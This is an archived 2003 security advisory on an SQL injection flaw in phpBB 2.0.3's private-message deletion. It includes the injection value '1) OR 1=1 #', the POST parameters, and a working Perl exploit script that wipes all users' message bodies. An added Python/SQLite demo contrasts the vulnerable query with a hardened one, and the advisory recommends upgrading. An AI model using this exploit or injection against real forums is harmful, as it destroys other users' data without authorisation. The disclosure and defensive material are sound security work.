
phpBB SQL Injection vulnerability



20th Jan 2003 [SBWID-5938]
COMMAND

	phpBB SQL Injection vulnerability

SYSTEMS AFFECTED

	phpBB 2.0.3, possibly others

PROBLEM

	Ulf Harnhammar [ulfh@update.uu.se] of VSU Security posted:
	
	The function for deleting private messages has got an SQL Injection
	hole. If we submit data saying that we want to delete private message
	number "1) OR 1=1 #", the text of all private messages for all users on
	the system will be deleted.
	
	The messages are stored in two tables, and the SQL Injection will only
	work on one of them, so all the text bodies are deleted but the
	subjects and metadata are only deleted if they belong to the current
	user. This means that the subjects of the deleted messages will still
	show up in the other users' folders. When a user clicks on a deleted
	message, he or she will just be redirected back to the folder.
	
	You can exploit this by POSTing the following values to
	privmsg.php?folder=inbox&sid=[THE SID VALUE]:
	
	  mode=""
	  delete="true"
	  mark[]="1) OR 1=1 #"
	  confirm="Yes"
	
	The current SID value is shown in the URL field, if you log in to the
	system with cookies turned off.
	
	#!/usr/bin/perl --
	
	# phpBB delete the text of all users' private messages exploit
	# Ulf Harnhammar
	# January 2003
	#
	# Sends the POST described above to privmsg.php with mark[] set to the
	# injection string "1) OR 1=1 #". The sid must be a valid session id.
	
	use Socket;
	
	if (@ARGV != 2) { die "usage: $0 host sid\n"; }
	
	($host, $sid) = @ARGV;
	$host =~ s|\s+||g;   # strip any stray whitespace from the arguments
	$sid =~ s|\s+||g;
	
	$crlf = "\015\012";
	# Raw HTTP/1.0 request; the body is the URL-encoded form above
	# (58 bytes, matching the Content-Length header).
	$http = "POST /privmsg.php?folder=inbox&sid=$sid HTTP/1.0$crlf".
	        "Host: $host$crlf".
	        "User-Agent: Mozzarella/1.37++$crlf".
	        "Referer: http://www.phpbb.com/$crlf".
	        "Connection: close$crlf".
	        "Content-Type: application/x-www-form-urlencoded$crlf".
	        "Content-Length: 58$crlf$crlf".
	        "mode=&delete=true&mark%5B%5D=1%29+OR+1%3D1+%23&confirm=Yes";
	
	$tcp = getprotobyname('tcp') or die "Couldn't getprotobyname!\n";
	$hosti = inet_aton($host) or die "Couldn't look up host!\n";
	$hosts = sockaddr_in(80, $hosti);
	
	socket(SOK, PF_INET, SOCK_STREAM, $tcp) or die "Couldn't socket!\n";
	connect(SOK, $hosts) or die "Couldn't connect to port!\n";
	
	select SOK; $| = 1; select STDOUT;
	
	print SOK $http;
	
	$junk = '';
	while (<SOK>) { $junk .= $_; }
	
	close SOK or die "Couldn't close!\n";
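
The two-table behaviour described in the post, simulated as an added example (Python with SQLite; this is neither phpBB's code nor part of the original post). It is a hypothetical reconstruction: the metadata DELETE runs each mark[] value through an integer cast and an owner check, while the body DELETE splices the raw strings into its IN (...) list, so the "1) OR 1=1" payload wipes every body but only the caller's own subject row. A hardened version with strict validation and bound parameters sits beside it. Table and column names and the sample rows are constructed for the demo; because SQLite has no "#" comment marker, the payload is carried with SQLite's "--" spelling.

```python
import re
import sqlite3

# Constructed stand-in for the two private-message tables the advisory
# describes: one holds owner/subject metadata, the other the body.  Names are
# assumptions for this demo, not phpBB's actual schema.
SCHEMA = """
CREATE TABLE privmsgs (privmsgs_id INTEGER PRIMARY KEY,
                       privmsgs_to_userid INTEGER, privmsgs_subject TEXT);
CREATE TABLE privmsgs_text (privmsgs_text_id INTEGER PRIMARY KEY,
                            privmsgs_text TEXT);
"""

# Constructed sample data: (message id, recipient user id, subject, body).
SAMPLE_ROWS = [
    (1, 100, "re: meeting", "see you at noon"),
    (2, 100, "lunch?", "cafeteria at one"),
    (3, 200, "invoice", "attached, please pay"),
    (4, 300, "credentials", "rotated this morning"),
]

# The advisory's payload ends in "#", MySQL's end-of-line comment marker.
# SQLite only knows "--", so the demo uses that spelling of the same payload.
PAYLOAD = "1) OR 1=1 -- "


def fresh_db():
    """Return an in-memory database populated with SAMPLE_ROWS."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    for pm_id, to_uid, subject, body in SAMPLE_ROWS:
        db.execute("INSERT INTO privmsgs VALUES (?, ?, ?)", (pm_id, to_uid, subject))
        db.execute("INSERT INTO privmsgs_text VALUES (?, ?)", (pm_id, body))
    db.commit()
    return db


def count_rows(db):
    """Return (metadata rows, body rows) still present."""
    meta = db.execute("SELECT COUNT(*) FROM privmsgs").fetchone()[0]
    text = db.execute("SELECT COUNT(*) FROM privmsgs_text").fetchone()[0]
    return meta, text


def leading_int(s):
    """Mimic PHP intval() on a string: leading digits, otherwise 0."""
    m = re.match(r"\s*(\d+)", s)
    return int(m.group(1)) if m else 0


def delete_vulnerable(db, user_id, mark):
    """Hypothetical reconstruction of the flawed pattern: the metadata query
    casts mark[] to integers (payload degrades to 1, owner check holds); the
    body query splices the raw strings into IN (...), so OR 1=1 matches every
    row and the comment marker swallows the closing parenthesis."""
    safe_ids = ", ".join(str(leading_int(m)) for m in mark)
    raw_ids = ", ".join(mark)
    db.execute(f"DELETE FROM privmsgs WHERE privmsgs_id IN ({safe_ids}) "
               f"AND privmsgs_to_userid = {int(user_id)}")
    db.execute(f"DELETE FROM privmsgs_text WHERE privmsgs_text_id IN ({raw_ids})")
    db.commit()


def delete_hardened(db, user_id, mark):
    """Fixed version: strict integer validation, bound parameters, and bodies
    removed only for messages the caller owns.  Returns the number deleted."""
    for m in mark:
        if not re.fullmatch(r"\d+", m):
            raise ValueError(f"rejecting non-numeric message id {m!r}")
    ids = [int(m) for m in mark]
    if not ids:
        return 0
    holes = ", ".join("?" * len(ids))
    owned = [r[0] for r in db.execute(
        f"SELECT privmsgs_id FROM privmsgs WHERE privmsgs_id IN ({holes}) "
        "AND privmsgs_to_userid = ?", (*ids, user_id))]
    if owned:
        holes = ", ".join("?" * len(owned))
        db.execute(f"DELETE FROM privmsgs WHERE privmsgs_id IN ({holes})", owned)
        db.execute(f"DELETE FROM privmsgs_text WHERE privmsgs_text_id IN ({holes})", owned)
    db.commit()
    return len(owned)


def demo():
    """Run both code paths on fresh copies of the data; return the row counts."""
    out = {}
    db = fresh_db()
    delete_vulnerable(db, 100, [PAYLOAD])
    out["vulnerable_after_payload"] = count_rows(db)   # (3, 0): every body gone
    db = fresh_db()
    delete_vulnerable(db, 100, ["1"])
    out["vulnerable_honest_delete"] = count_rows(db)   # (3, 3)
    db = fresh_db()
    try:
        delete_hardened(db, 100, [PAYLOAD])
        out["hardened_rejected_payload"] = False
    except ValueError:
        out["hardened_rejected_payload"] = True
    out["hardened_after_payload"] = count_rows(db)     # (4, 4): nothing touched
    db = fresh_db()
    out["hardened_deleted"] = delete_hardened(db, 100, ["1", "3"])  # 1: id 3 is not ours
    out["hardened_after_honest"] = count_rows(db)      # (3, 3)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The mismatch between the two deletes is what produces the symptom in the post: other users keep their subject rows, so the messages still list in their folders, but the body rows behind them are gone.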
	

SOLUTION

	Upgrade to phpBB 2.0.4.

